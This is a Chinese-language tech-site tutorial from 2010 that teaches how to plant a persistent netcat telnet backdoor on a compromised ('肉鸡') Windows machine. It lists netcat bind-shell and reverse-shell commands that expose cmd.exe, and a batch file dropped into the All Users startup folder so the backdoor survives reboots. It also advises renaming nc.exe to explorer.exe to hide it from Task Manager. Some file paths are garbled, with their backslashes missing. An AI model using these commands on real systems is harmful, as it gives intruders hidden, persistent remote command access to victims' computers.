2010-08-01 22:27:08 来源:比特网
通过本案例你可以学习到:
(1)通过nc来构建telnet后门
(2)利用bat文件来启动nc后门
nc俗称为网络中的“瑞士军刀”其功能强大,如果在肉鸡上运行“nc.exe –p port –L –d –e cmd.exe”命令就可以构建一个telnet后门,即使关闭了nc.exe程序运行窗口,该后门程序还继续存在。本案例通过一个bat文件来构建一个telnet后门,当系统重新启动后,该后门会继续存在。当然nc还有许多其它用法:
(1)连接到REMOTE主机,格式:nc -nvv 192.168.x.x 80 ,表示连到192.168.x.x的TCP80端口
(2)监听LOCAL主机,格式:nc -l -p 80 ,表示监听本机的TCP80端口
(3)扫描远程主机,格式:nc -nvv -w2 -z 192.168.x.x 80-445,表示扫描192.168.x.x的TCP80到TCP445的所有端口
(4)REMOTE主机绑定SHELL,格式:nc -l -p 5354 -t -e c:winntsystem32cmd.exe,表示绑定REMOTE主机的CMDSHELL在REMOTE主机的TCP5354端口
(5)REMOTE主机绑定SHELL并反向连接, 格式:nc -t -e c:winntsystem32cmd.exe 192.168.x.x 5354 讲解:绑定REMOTE主机的CMDSHELL并反向连接到192.168.x.x的TCP5354端口。
(6)作攻击程序用,格式:
type.exe c:exploit.txt|nc -nvv 192.168.x.x 80
nc -nvv 192.168.x.x80
连接到192.168.x.x的80端口,并在其管道中发送'c:ex ploit.txt'的内容
(7)作蜜罐用,格式:nc -L -p 80 讲解:使用'-L'(注意L是大写)可以不停地监听某一个端口,直到ctrl+c为止;格式:nc -L -p 80>c:log.txt 讲解:使用'-L'可以不停地监听某一个端口,直到ctrl+c为止,同时把结果输出到'c:log.txt'中,如果把'& gt;' 改为'>>'即可以追加日志 附:'c:log.txt'为日志等
下面主要介绍如何通过nc批处理命令来构建一个telnet类型的后门:
1.编辑一个bat文件。
在IP地址为192.168.1.19的计算机上新建一个bat文件,取名为“1.bat”,在其中输入以下内容,如图1所示。
@
@ start
@c: c.exe –p 4455 –L –d –e cmd.exe
@exit
图1 构建一个bat文件
2.将1.bat复制到“All user”的启动文件夹。
将“1.bat”文件复制到“C:Documents and SettingsAll Users「开始」菜单程序启动”文件夹下,如图2所示。
图2 复制1.bat文件到启动文件夹下
3.等待重启后使用telnet连接肉鸡ip。
重启计算机后,用户进入计算机后,会执行“1.bat”脚本,会启动nc程序从而开启4455端口。在本地使用命令“telnet 192.168.1.19 4455”连接IP地址192.168.1.19 的计算机的4455端口,如图3所示,可以通过telnet连接肉鸡并在肉鸡上执行各种命令。
图3 使用telnet连接肉鸡4455端口
技巧
可以将nc.exe文件重新命名为其他文件,例如explorer.exe等,这样在任务管理器中看到的nc.exe变成了explorer.exe了,不容易被发觉,而nc命令中加入“-L -d”后即使关闭了nc监听窗口,该命令行还继续存在。
小结
本案例通过编写bat批处理文件,并将该bat文件放入“C:Documents and SettingsAll Users「开始」菜单程序启动”文件夹下,则无论那个用户登陆,都会启动该bat文件,从而保留nc的telnet后门,该后门只要知道端口,通过telnet程序可以直接连接。
免责声明:本网站(http://www.ciotimes.com/)内容主要来自原创、合作媒体供稿和第三方投稿,凡在本网站出现的信息,均仅供参考。本网站将尽力确保所提供信息的准确性及可靠性,但不保证有关资料的准确性及可靠性,读者在使用前请进一步核实,并对任何自主决定的行为负责。本网站对有关资料所引致的错误、不确或遗漏,概不负任何法律责任。
本网站刊载的所有内容(包括但不仅限文字、图片、LOGO、音频、视频、软件、程序等)版权归原作者所有。任何单位或个人认为本网站中的内容可能涉嫌侵犯其知识产权或存在不实内容时,请及时通知本站,予以删除。